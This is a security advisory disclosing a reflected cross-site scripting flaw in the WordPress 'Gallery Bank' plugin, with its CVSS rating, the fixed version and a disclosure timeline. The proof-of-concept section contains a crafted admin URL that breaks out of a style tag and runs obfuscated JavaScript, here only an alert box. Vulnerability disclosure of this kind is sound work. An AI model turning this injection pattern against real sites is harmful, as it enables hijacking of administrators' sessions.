WP Gallery Bank - Best Gallery Albums Plugin 2.0.26 - 3.0.69, Reflected XSS

The output of an un-sanitized QSA string allows injection of arbitrary content on the WordPress admin panel. Quotes are escaped with slashes before being output, so the attacker must take this in to account when generating a payload.

Homepage

https://wordpress.org/plugins/gallery-bank/changelog/

CVSS Score

5

CSSS Vector

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Attack Scope

remote

Authorization Required

None

Mitigation

Update to version 3.0.70

Proof of Concept

If a user who has administrative access – and is already logged in – can be tricked into visiting a specifically crafted link, then arbitrary JS can be executed. The below example will trigger an alert box upon visiting the page.

http://localhost/wp-admin/admin.php?page=gallery_album_sorting&order_id={}%3C/style%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,34,46,34,41%29%29%3C/script%3E%3Cstyle%3E

Timeline

  • 2014-10-10: Discovered
  • 2014-10-10: Reported to vendor
  • 2014-10-11: Vendor responded, 3.0.70 released, issue resolved
  • 2014-10-13: CVE requested
  • 2014-10-14: CVE assigned
  • 2014-10-18: Advisory released